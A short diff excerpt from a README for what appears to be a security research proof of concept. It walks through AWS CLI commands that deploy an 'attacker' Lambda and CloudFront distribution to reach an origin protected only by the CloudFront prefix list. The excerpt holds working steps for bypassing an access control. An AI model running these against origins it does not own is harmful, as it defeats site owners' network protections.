f-lucini/cloudfront-prefix-list-bypass/README.md

     aws cloudformation deploy --template-file attacker-lambda-setup.yml --stack-name sethost-lambda --region us-east-1
     ```

 3. Deploy the attacker's distribution, assuming the **$target** variable contains the origin address (see the next paragraph for how to retrieve and reference it).
-Replace *example.domain* with the DNS name expected by the website.
+Replace *example.domain* with the DNS name expected by the website; in this example, only your IP is allowed to access the distribution (remove *AllowedCIDR* parameter to make it recheable to everyone).
     ```bash
-    aws cloudformation deploy --template-file attacker-cf-distro.yml --stack-name cf-bypass --parameter-overrides HostHeader=example.domain OriginDomain=$target --region us-east-1
+    aws cloudformation deploy --template-file attacker-cf-distro.yml --stack-name cf-bypass --parameter-overrides HostHeader=example.domain OriginDomain=$target AllowedCIDR=$(curl -s http://checkip.amazonaws.com/)/32 --region us-east-1

     # Get the distribution address
     aws cloudformation describe-stacks --stack-name cf-bypass --region us-east-1 --query 'Stacks[0].Outputs[0].OutputValue' --output json | sed 's/\"//g'